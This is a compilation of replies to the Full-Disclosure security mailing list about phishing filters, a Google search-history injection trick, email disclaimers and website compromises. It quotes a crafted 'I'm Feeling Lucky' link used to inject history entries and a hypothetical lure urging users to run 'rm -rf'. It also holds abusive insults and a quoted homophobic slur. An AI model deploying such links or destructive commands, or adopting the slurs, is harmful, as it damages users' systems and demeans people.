Chris Evans to Thierry Zoller: > > Example > > If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack > > but with ridiculy low impact to the end-user as it only crashes the tab > > it was subjected to, and not the whole browser or operation system. > > But the fact remains that this was the impact of a DoS condition, > > the tab crashes arbritarily. > > Eh? If you visit www.evil.com and your tab crashes, that's no > different from www.evil.com closing its own tab with Javascript. But what if www.evil.com has run an injection attack of some kind (SQL, XSS in blog comments, etc, etc) against www.stupid.com? Visitors to stupid.com then suffer a DoS... Yes, stupid.com should run their site better, fix their myriad XSS holes, etc, etc. But this is the Internet, so this "software flaw" can be leveraged as security vulnerability. I'm with Thierry on this... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft issues out-of-band patch
n3td3v wrote: <> > What i'm saying is this: MI5's systems are patched against flaws that > only they know about and their technicians have developed their own > in-house patches for them. > > If that isn't impressive I don't know what is. Didn't you rail against the ZERT efforts when 0-days were being widely used in the wild and MS was doing "nothing much" abou them? Oh, sorry, I forgot which publicity whore I was talking to... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FD subject line/name of org suggestion...
Knud Erik Højgaard wrote: > How do you >read< anything with an SMTP client? With your preferred file lister in its queue or spool dir. How do you do it? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bruteforcing HTML and browser-sec to find BoF's
Malformed Guy wrote: > There have been a lot of recent IE exploits and talk of "browser-sec" > floating around recently and I thought "Hey, what if you made a script > that actually bruteforced html?" For example a script that spews out > possible combinations of HTML/ASP/JAVASCRIPT/JAVA/SQL/PHP: > > <> > Idea was inspired by the Samy worm: > http://namb.la/popular/tech.html > "To get around this, some browsers will actually interpret "java\nscript" as > "javascript" (that's > javascript)." You're new to this whole scene, right? You don't think that malware authors often, usually or any other way reliably come up with most of the ideas in their code do you? > P.S. Someone tell me this is an awesome idea, else I'll cry like a little > girl. It _is_ a fairly awesome idea. But you'd better start crying anyway bitch as you've just reinvented a (rather limited form of) HTML fuzzing. In various forms, fuzz testing has been around for about 20 years, so I guess it's understandable you'd have missed discovering that this approach has already been discovered... See what Wikipedia has to say about it: http://en.wikipedia.org/wiki/Fuzz_testing and soak up the history from the original (??) fuzz site: http://en.wikipedia.org/wiki/Fuzz_testing Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: We're letting the bad guys win
nutd1v3 wrote: > I'm only interested in specific intelligence. Which explains the torrents of non-specific drivel you pour into this list how??? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Police probe BNP link to car fire
Sam Stelfox wrote: > I figure this would be a good time for a first post to the list. ... To feed a troll? Hm... > ... I find > no merit in staying on this list, in fact the only reason I'm still on > this list is because I find it terribly funny seeing how many people > bash someone who has the temperament and intelligence of a high school > script kiddie. ... Boy -- you really rate nutd1v3 don't you! > ... I know it's kind of sick and twisted ... Sounds like this list is just right for you then -- or vice versa. > ... but the responses > you get make my day. Actually, the responses nutd1v3 gets make _HIS_ day -- it's folk like you (Valdis is a special case) who are responsible for his sad, miserable, continuing existence... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v group members important notice
n3td3v wrote: > A security conference has been held according to the threat where > n3td3v was discussed. n3td3v has taken this intelligence very > seriously, and is coordinating efforts to find out who made the threat > towards n3td3v. Hell -- can't have been much of a security conference if you were mentioned! Well, mentioned in anything other than the most cursory way or as a (bad) passing joke... I've just been at a security conference and I'm fairly confident in asserting that you almost certainly weren't mentioned at all. Ohhh, and please invoke Google Goggles before responding! Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pause for reflection
n3td3v wrote: > I've found something to stop me and gadi sending shit emails to F-D... > > http://gmailblog.blogspot.com/2008/10/new-in-labs-stop-sending-mail-you-later.html?foo So, for the greater good you've enabled it 24x7, yes? Now all we have to do is get Google to make the list of problems about 97 long when Goggles runs under your account... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker's extraditionto US
Exibar wrote: > This guy hacked into the Pentagon, illegally, and you don't want him to > stand trial in the country that he committed the crime against? What if a > US citizen hacked into UK Parliament? Would you want him tried in the US or > in the UK? So you guys are going to hand Dubya over to the international courts to stand trial for starting an illegal war? And your top gnerals, heads of staff, etc for illegally executing his illegal orders? Physician, heal thyslef... (Actually, I don't care that much about McKinnon (sp?) -- my gut feeling is that to the extent history remembers him it will be as a slightly deranged whack-job more than as "the guy who hacked the Pentagon changing military history forever"...) Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ITTS012008 - YAHOO WEB MAIL URL REDIR
Martin Fallon wrote: <> > > VI - CRONOLOGY > > > 09/09/2008 - Vulnerability Discovered. > 09/10/2008 - Attempt to contact yahoo - no success. > 09/11/2008 - Attempt to contact yahoo - no success. > 09/15/2008 - Attempt to contact yahoo - no success. > 09/20/2008 - Advisore Published. Sometimes I wonder why we bother... This has been used in the past (and maybe even to phish Yahoo -- not sure now). Several times. And reported thusly. Maybe Yahoo just doesn't care? They fixed this same redirector issue on other Yahoo sub-domains, but missed (or chose not to fix it on) the "login" sub-domain. The gibbons in their web dev teams must be seriously underpaid, or just don't care. The Yahoo! security wonks who got this fixed on the other sub-domains back in February will be a tad pissed at the gibbons for missing this instance though, I suspect... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] die
Dragos Ruiu wrote: > Seriously... with modern multi-paned mail readers, top-posting is a > better way to communicate. That depends on how you define "communicate"... It also assumes that everyone will gladly, sheepfully use "modern, multi- paned mail readers". You may be a sheep whose communications consist of little more than adding simple confirming, negating or further-detail-requesting bleats to others' messages, but "discussion lists" and many other forms of communication commonly engaged via Email by higher order, bi-pedal mammals demand more sophistication of all of the communicator, mail reader and medium... If you dislike "no top posting" because of neanderthals who haven't grokked that it is about better communication and thus mindlessly quote an entire message to add their simple confirming, negating or further- detail-requesting grunts at the bottom, then you are making a false comparison, as such stupidity is equally anti-communication-assisting as your preferred top-bleating approach. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] simple phishing fix
of the problem undermines your solution again... > Don't forget that "achovia." can be listed, to catch wachovia.com, > vvachovia.com, vvachovia.co.uk etc. But not WA(HOVIA.COM, nor WACH0VIA.COM, nor WACHOVIA.C0M, nor WACHOV1A.COM nor WACHO\/IA.COM, etc, etc. How many permutations are there? For this one domain name? H... > Think about it, most people have no need to accept mail from every > bank in the world. That is accept ALL. Using the blacklist means > they are now denying all bank traffic. (OK, denying all on the list, > I agree that it's not a complete deny all, because we cannot know the > names of all banks in advance. I do regret confusing the discussion > by mentioning DENY ALL, I was hoping to explain my analogy to a > firewall, eg., it blocks everything by default and then lets in what > you tell it to let in, I do accept that unlike a real firewall it can > be got around by using an unlisted name, it's really DENY MOST.) > > > "(x) Mailing lists and other legitimate email uses would be affected > > Irrelevant. They are affected already. They are the victims of > spoofing. It's either block their mails, or users suffer the spoofs. > Given than suffering the spoofs means bank-originated mails are > useless in any case, that means the only available course of action > is to deny all bank email traffic. > > > my Bayesian filter gets these anyway > > My spam filter misses some, hence my post, however following this > comment I have checked my config and the Bayesian plugin is disabled > ;) Thank you for the suggestion. > > [1] http://en.wikipedia.org/wiki/Invisible_hand Yawn... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] simple phishing fix
lsi wrote: > Of all the approaches below I like the simple list of strings in the > email client (the first link). This is because it's a DENY ALL > policy. ... "simple" -- yes. "DENY ALL" -- nope... >From your first post, it's clear that you receive samples from a _VERY_ limited sliver of the bank, credit union and other financial target phishing that goes on each and every day... >From a purely theoretical perspective, to make your preferred approach "DENY ALL" you would have to have ongoing access to an oracle identifying the domains of ALL financial institutions, so your block list could be updated in a timely manner as domains are added and removed... As no such oracle exists, a "deny all" approach along the lines you suggest is _practically_ impossible. > ... The other approaches below, AFAICS, use ACCEPT ALL and then > try and find reasons to block the mail. ... Which is actually what your suggested approach does, even if it could be practically implemented -- it accepts all Email (or at least all incoming Email delivery connections) then tries to find a reason to block it (From address domain on block list). > ... The first approach simply > blocks them all! ... ...for some interesting and unknowably odd value of "all". > ... Sure, you want to receive mail from the Bank of > Foo, just don't put bankoffoo.com in your list! Thereby letting through the phish for the target(s) of most danger to you -- get suckered by a Foo Bank phish as a Foo Bank customer and you may be in trouble, but getting suckered by a Bar Bank phish when you are only a Foo Bank customer and no harm is done. Also, your preferred approach entirely fails to deal with "close but not quite" domain "spoofing" -- [EMAIL PROTECTED] rather than [EMAIL PROTECTED], [EMAIL PROTECTED] rather than [EMAIL PROTECTED] (the real Foo Bank domain), etc, etc, etc. In short, as is commonly the case in such matters, the quick'n'dirty, I- just-thought-of-the-ultimate-solution-to-the-phishing-problem-AND-it's- REALLY-SIMPLE solution is so far from complete that it's all but useless... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DNS Cache Dan Kamikaze (Actual Exploit Discussion)
Mark Andrews wrote: > ... I like simple tools. This is the list for you then -- there are lots of folk meeting the description here... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to det ect credit cards
Randal T. Rioux to Bill West: > > I am no longer on-site full time and have limited access to e-mail. I will > > respond to you as soon as I can. If your issue is an emergency, please use > > the contacts below. <> > > Did I mention the social engineering treasures sent around the world with > each one? Do you really work in security? Maybe this kind of thing is why he no longer... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability Note VU#12345 (Security Group)
[EMAIL PROTECTED]@n Virtuel wrote: > im a newcomer on this list , and im a little disgusted to see > "Professionals" acting as Kids . > > i was expecting to get a really professional list, with correct content, > instead of that i can see only insults, racisms, and kiddies writtings. Is > there not a Moderator, because i feel this is really annoying. Although your message appears to be _about_ the Full-Disclosure list, it seems you have misunderstood the role of the various "security" mailing lists -- your post would be much more "on topic" had you posted it to the "funsec" list. Regardless -- other lists may be even more appropriate -- your post is clearly sadly misplaced in F-D itself. As a self-acknowledged newbie here, you should lurk a while longer before posting to F-D again (personally, I'd suggest about 18-24 months). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hotmail SPAM control
Andrew Dowden wrote: > Who do you contact to tell Hotmail that your CRM output is not SPAM? The Pope? As the probability that your CRM output is or is not spam is something we cannot know, how the fark do you think we can sensibly answer your question? Oh -- and in general, NOT having Hotmail accept your mail is probably considered a positive thing here. Now, if theer was just some way to stop Hotmail trying to send Email _to_ us... > ** > This email with any attachments is confidential and may be subject > to legal privilege. If it is not intended for you please reply > immediately, destroy it and do not copy, disclose or use it in any > way. The views expressed in this email are not necessarily the views > of the originating business. > ** Let's _all_ send him a message saying we incorrectly received a copy of his message and affirm that we destroyed it, did not copy it nor disclose it nor use it in any way (except as directed in the pseudo- legalistic footer) _AND_ demand that his lawyer send our lawyers acknowledgment that we have acted in accordance with their legal demands and thereby acknowledge that they will not ever be taking any kind of legal action against us as a result... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Injecting spam into Google Web History via I'm Feeling Lucky queries
Alexander Konovalenko wrote:
> Google Web History is vulnerable to a CSRF-like attack that allows an
> attacker to inject some entries into the user's search history. ...
U -- that's not an "attack"; it's a feature!
> ... If you
> are logged in to your Google account and have Web History enabled,
> clicking on a malicious link will result in a Google search being
> logged to your search history without your consent.
As will clicking on a "non-malicious" link inducing a Google search
(one may argue that any link that induces a Google search is a
malicious link, but that would make google.com inherently evil and we
surely aren't ready to conced that, yet, are we??).
What you've described is simply Google Web History doing what it is
designed to do. If you don't want GWH to record all your Google
searches, don't login to your Google account while browsing the web in
general, _or_ don't enable GWH.
If you don't like that Google can be induced to auto-search-and-
redirect via a URL embedded in a page (or HTML Email, etc) then use a
browser, MUA, etc that doesn't handle iframe tags (or at least gives
you a degree of control over them).
If you don't like Google's "I'm feeling lucky" feature, then complain
to Google that they shouldn't write crap-lets like "I'm feeling lucky"
which don't, at a minimum, check that the referer is a legitimate
Google domain.
The latter won't actually help -- the bad guys have been abusing "I'm
feeling lucky" for quite a while now and Google clearly has decided to
stay on the side of spammer-friendly technology enablers and has done
nothing suitable about the situation (the necessary server-side referer
checking code to break all simple malicious use of this "feature" of
Google search should not be that far beyond the ken of their reputedly
massive number of Ph.D-wielding employees, so their lack of action
toward such a move must mean that Google prefers to remain the spam-
friendly redirector farm of choice).
> The malicious link can look something like this: href="http://www.google.com/search?q=ENLARGE+YOUR+WHATEVER+NOW+uniquePageId+site:example.com&btnI=I'm+Feeling+Lucky">
> compelling vista exploits, free beer and cat pictures
Such URLs have been used in spam for quite some time, but their general
purpose is not to get some triflingly short-lived spam URL into folks'
Google Web Histories (should they even have this feature enabled), but
simply was a convenient anti-spam-filtering workaround until the anti-
spammers devised Google "I'm feeling lucky" URL parsers (i.e., when
first used by spammers, the anti-spammers couldn't simply write filters
to outright block arbitrary www.google.com, and its many "localized"
variants, URLs).
> It will perform an I'm Feeling Lucky search on your behalf that will
> immediately redirect you to a specific example.com page prepared by
> the attacker in advance. For the attack to work, the page should be
> indexed by Google and should match the query keywords ("enlarge",
> "your" and so on). To ensure that the link always leads to a specific
> page, the attacker can include the same unique word ("uniquePageId")
> in the text of the destination page and in the search query. Besides
> these requirements, the destination page can have any content.
As I said...
See the following page (search for "Are you feeling lucky, Sergey?"):
http://www.jgc.org/tsc.html
> To spam you with numerous Web History entries the attacker needs to
> vary the search queries embedded into his links.
Ahh yes -- that's wondrously trivial, but I'll not help the bad guys by
describing here the several ways I've already thought of to morph these
kinds of URLs and which the bad guys have either not already devised
(or, at least, not already used).
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Dude VanWinkle's Death
Andrew A wrote: > Some dumb faggot suiciding ... Yet you're still posting? > ... appears more of a net social benefit than a > tragedy. We're waiting... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
Pat wrote: > All I could find was a loose relation to PGP? I might research this one a > bit later tonight... The hint (for anyone who ever saw much of this) is the obviously non- Base64, but still 7-bit sub-set, character set that includes lots of punctuation chars and no lowercase. Think pre-MIME/Base64 and U should be able to suss it out... > Nothing like learning something new, as I mentioned in my Base-64 encoded > message. This is fr from new (but that's kinda the point, I guess). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
Pat wrote:
> SSBkb25cJ3QgdW5kZXJzdGFuZCB3aGF0IHRoZSBiaWcgaXNzdWUgaXMuIFNvIHdoYXQgaWYgcGVvcGxlIGRvblwndCB1bmRlcnN0YW5kLi4uPw0KU29tZSBwZW9wbGUsIGFuZCB0aG9zZSB0aGF0IHRoaXMgaXMgb2J2aW91c2x5IHJlbGV2YW50IHRvLCB3aWxsIGxvb2sgYXQgdGhlIGFib3ZlIHN0cmluZywgb3IgZXZlbiB0aGlzIG9uZSwgYW5kIGtub3cgd2hhdCBpdCBpcyB0aGF0IHdlIGFyZSBkaXNjdXNzaW5nLCBhbmQgaG93IHRvIGRlY29kZSBpdC4gVGhvc2UgZm9yIHdob20gdGhpcyBpcyBub3QgcmVsZXZhbnQgd2lsbCBub3QgYmUgYWJsZSB0byB1bmRlcnN0YW5kLCBhbmQgbm9yIHNob3VsZCB0aGV5IGhhdmUgdG8uDQpJIHNlZSBubyBwb2ludCBpbiBwYXlpbmcgb3V0IG9uIHBlb3BsZSBmb3IgdGhlIGFiaWxpdGllcyB0aGF0IHRoZXkgZG8gbm90IHBvc3Nlc3MuIEVhY2ggYW5kIGV2ZXJ5IG9uZSBvZiB1cyBoYXMgaGFkIHRvIGxlYXJuIHRoZXNlIHRoaW5ncyBhdCBzb21lIHBvaW50LCBhbmQgc28gYXQgc29tZSBwb2ludCBpbiB0aW1lLCB5b3UgdG9vLCB3ZXJlIGtlcHQgXCJvdXQgb2YgdGhlIGxvb3BcIiB3aGlsZSBwZW9wbGUgdGhhdCB0aG91Z2h0IHRoZXkgd2VyZSBiZXR0ZXIgdGhhbiB5b3UgZGlzY3Vzc2VkIHRoaW5ncyBpbiBsYW5ndWFnZXMgdGhhdCB5b3UgZGlkblwndCB1bmRlcnN0YW5kLg0KDQpTb3J0YSBsaWtlIHJlLXdyaXRpbmcgYWxsIHRoaXMgaW4gR2VybWFuIC4uLg==
Ahhh, yes, but...
C+BXN9&[EMAIL PROTECTED]@979E;B!N965D('1O(&=O('1O($=Ehttp://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
Harry Hoffman wrote: > Ok, I'll give... > > Is this anything more then a base64 encoded password hash? Nope, it's not _even_ that. You were half right though -- for half-credit you can try again... (Hint: You'd have to be pretty stellar to not need to deode it to get the answer!) Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
reepex wrote: > if base64 was challenging for you then maybe you should switch fields of > work Yes -- I guess he could try whatever it is you do... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
[EMAIL PROTECTED] wrote: > Cute, but probably lost on the half of the list that couldn't > figure out what it was. :) Wow -- you think that _many_ understood it?? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NorfolkDesign.com proven track of excellence
Ronnie - Norfolk Design to me: > All we are trying to do is neutralise false accusations that were made about > us by a malicious spammer which are appearing in search engines. I have > personally contacted John the list administrator and have his full > permission to do this. > > We have a signed letter from the BBC litigation department confirming that > the accusations are completely untrue. > > I really hope all members understand, and offer my sincerest apologies for > any inconvenience this is causing but it's our only option. > > Kindest regards > Ronnie Zahdeh > Norfolk Design > Limits are in the mind, not on the web. > E-mail: [EMAIL PROTECTED] > Website: http://www.norfolkdesign.com > > The information contained in this email is sent from Norfolk Design and is > intended to the addressed recipient(s) only. The content is confidential and <> I (loosely) understand your grievance. I disagree with your choice of methods to "correct" it. Sending the same message to this list at least three times, and now largely repeating that message but not in the pseudo-legalistic mumbo- jumbo some cheap lawyer scribbled on the back of an envelope in the bar the night before last does not help make you look like a victim. Pairing it with a totally nonsensical pseudo-legalistic "disclaimer", probably programmatically attached to all Email sent out from your company Email server beyond your control, just make you look even sillier. _That_ is what I was pointing out. I don't give a rat's arse about your perceived slandering or even the (initial) steps you've taken to "correct" it (as, it seems, you see this farce). I start to care when you needlessly repeat yourself _especially_ when you couple all that with your nonsensical, legally meaningless and uneforceable, "disclaimers" Rather than wasting your and our time trying to further justify your increasing nonsense, go spend a few quid on a _competent_ IT lawyer and ask him why folk are making fun of your Email "disclaimers"... (I suspect you'll have trouble deciding if any given lawyer you choose to consult about this is "competent" to provide such advice, but as a rough rule of thumb, if they don't suggest drastic changes to (generally, blanket removal of) your current "disclaimer", their opinion is not worth paying for.) Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NorfolkDesign.com proven track of excellence
Ronnie - Norfolk Design wrote: <> > Ronnie Zahdeh > Norfolk Design > Limits are in the mind, not on the web. > > E-mail: <mailto:[EMAIL PROTECTED]> [EMAIL PROTECTED] > Website: <http://www.norfolkdesign.com/> http://www.norfolkdesign.com > > > The information contained in this email is sent from Norfolk Design and is Yeah, we kinda guessed... > intended to the addressed recipient(s) only. ... No sh*t superman? You'd be stupid enough to address something so potentially important (you think) to unintended recipients? Ohhh, but wait -- you sent it to a large, subscriber-list-withheld, public mailing list, so you clearly can have NO IDEA who the actual recipients will be > ... The content is confidential and > privileged. ... H -- now doesn't that raise some serious problems for you? You deliberately sent your message to a mailing list that you know you cannot know all the recipients of, _yet_ your message contains "confidential and privileged" information? You and/or your legal advisers are clearly stark raving bonkers. Or maybe that's the point? You're trying to establish insanity as a defence for whatever you may be, or have been, charged with/accused of? > ... If you are not the intended recipient ... In one sense, of course I am (one of the) intended recipient(s) as I subscribe to the mailing list you addressed the message to. And, if you didn't intend to address your message to this list but did so anyway (out of incompetence, say?) how am _I_ supposed to be able to tell that I am NOT an intended recipient? Am I, along with every other list member address owner/user supposed to have intimate knowledge of _your_ intentions? Pray tell us how... > ... please be aware that any > disclosure, copying, distribution or use of the contents is prohibited and > could be considered illegal. Darn -- I've got copies on my machine, there are partial copies of trace headers all over the Internet, there are multitudinous archives of the mailing list you chose to address this message to, there will still be many copies "in process" waiting for mail relays, servers, content scanners, etc, etc to "catch up" and so on. This request is thus nonsensical... > ... If you have received this electronic message in > error, ... As already described, how would I possibly know? (Yes, there are some circumstances where that could be more or less certain, but this clearly is NOT such a case.) > ... please accept our apologies, notify us immediately, and delete the > message. ... It may or may not be in error, but regardless of what you now say, I'll NOT delete it even if you do claim you sent it in error. What will you do about that? This pompous piece of less-than-pseudo-legalistic BS neither intimidates me nor impresses me -- it's meaningless piffle created by a moron with no understanding of WTF s/he was doing. > ... It is important to note that this email may contain views which are > the opinion of Norfolk Design. No sh*t superman? > All email sent from Norfolk Design is scanned using both client-side and > server-side multiple virus scanners using Norfolk Design's own servers. We > take every measure possible to ensure our emails do not contain any viruses, > but please note that we do not take responsibility if this eventuality > occurs. It is your responsibility to ensure all emails you receive from > Norfolk Design, are scanned with your own virus protection software. It's a pity you don't also scan all Email sent from Norfolk Design for meaninglessly bombastic, pseudo-quasi-legalistic nonsense, but never fear -- some of us apply our own scanners for such content... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] what is this?
crazy frog crazy frog wrote: > well, > i received many response but no one is perfact.i checked the files and > didn't find anything embeded in my scripts or pages.still i have to > figure out why my antivirus randomly popsup?i mean most of the times > it doesnt detect any infection but then suddenly this thing happnes > and then everything seems ok. > i dont think its a problem with my script otherwise i could have find > the code or it should be repeating consistly.has any one still facing > this issue in the techicorner.com or on tubeley.com or on > secgeeks.com? > > let me know i m trying hard to digg this issue. If you would tell us the _actual_ URL where this behaviour is being seen we would have a reasonable chance of actually diagnosing it. As it is, we're having to guess based on matching your half-arsed descriptions of what you think is happening with our knowledge of what has been seen going on out there. This may surprise you, but many thousands and thousands of sites are compromised each day to display "similar" activity to what you've asked to us to diagnose (aka "guess"). If we could look at the actual site and see what is really happening should have a better (if not perfect) chance of success. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] what is this?
3APA3A wrote: > Dear crazy frog crazy frog, > > Clear your computer from trojan, change FTP password for you site > hosting access, because it's stolen, access your hosting account via > FTP and remove additional text (usually at the end of the file, after > ) from all HTML/PHP pages. U -- the only part of that likely to be relevant here is the last. These kinds of web page "compromises" are typically achieved through bad/ill-configured/non-updated server-side web applications (or their underlying script engines) and are typically achieved without requiring any more special or privileged access to the victim sites than the ability to run a clever Google search or your own brute-force spidering via a bot-net, etc. Of course, simply removing the undesired iframe/script/etc tags from your compromised pages is not enough. Although doing so does not mean that this attacker will come back, it equally does nothing to close the hole they used in the first place, and the next attacker searching for that hole will hit you just as easily and indiscriminately... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
Kristian Erik Hermansen wrote: > > ... even if handled quite differently between browser types/versions. > > Bingo to coderman, the only security dude here who gets it. You would > be surprised the number of ridiculous personal emails I got regarding > this issue. Crowd SuRFing is here to stay... So does the simple expedient of setting browser.chrome.favicons to false "fix" this for FF users? Does it work in IE7's tabbed browsing? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] need help in managing administrators
[EMAIL PROTECTED] wrote: <> > Or you could go the EEPROM/CDROM route like most game consoles did. That's > easier on the practicality side, but still isn't as flexible as a > general-purpose PC. Which, of course, raises the question _today_, do _most_ computer users for _all_ their actual computer requirements _need_ a von Neumann Architecture GP computer, or would they be better off buying a Harvard Architecture system and their "applications" in cartridges, or similar? The basic machine would probably be a little more expensive and the applications might be a little more expensive, but that would be offset by the removal of any need (even desire) to buy things like antivirus apps, IPS, IDS, etc, etc, or ongoing costs of calling out security fix- it guys, replacing the machine ahead of time because it was far too riddled with crud-ware, etc, etc. von Neaumann made it easier, quicker and therefore cheaper to develop "complex" systems, especially given the then current hardware (and hence performance) restrictions in the early days of computing. Given what all those "old guys" knew way back then about what was so terribly wrong regarding securing von neumann systems, and given they were already obviously terribly cynical (aka "realistic") about the likelihood of those problems being permanently addressed, why were these issues not addressed at some point when the cost/performance points started to be more favourable? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] browser exploit web sites
Geo. wrote: > and you get a ton of websites hosting browser exploits being used to infect > computers. setup.exe and a bunch of other crapola. Some of them seemed > pretty clever. Nothing new just figured I'd pass on the search info in case > anyone was researching these. I didn't look real hard or at many of the search result pages, but I didn't see any exploits involved in this -- just your typical "use JS to (quite realistically) fake an online scan of the machine then push an installer .EXE" bogus anti-[adware|malware|spyware|virus] sites. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
Adam St. Onge wrote: > So if i put a picture of a naked girl on a website and said to see more you > must open a terminal and enter "rm -rf". > Would we consider this a trojan...or just stupidity? That would be "just stupidity", to use your terminology. "Trojan functionality" is a feature of the code of interest. Here there is no such code, just a user directly executing a (rather ill- advised) system command. The difference between what you describe and this new Mac trojan is that in the latter case the user accepts "the code of interest" as being "code to do something s/he wants" which turns out to also/instead be "code designed to do something s/he doesn't want" (there are no absolutely hard and fast definitions of "Trojan" in this context, so sorry if that seems a bit waffly, but generally "code of interest" will be some part of the fucntionality of an interpreted or executed program). So, what you describe is _not_ a Trojan but _does_ involve social engineering. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
